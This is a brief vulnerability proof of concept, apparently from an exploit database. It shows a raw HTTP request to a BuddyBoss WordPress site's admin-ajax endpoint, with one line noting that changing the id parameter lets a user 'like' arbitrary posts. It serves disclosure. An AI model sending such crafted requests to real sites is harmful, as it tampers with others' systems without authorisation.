## https://sploitus.com/exploit?id=WPEX-ID:FFBE4034-842B-43B0-97D1-208811376DEA
POST /wp-admin/admin-ajax.php HTTP/2
Host: buddyboss.example.com
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://buddyboss.example.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: https://buddyboss.example.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
scope=all&nonce=2081885524&action=activity_mark_fav&id=194628&modbypass=
By changing the id parameter it is possible to like arbitrary post.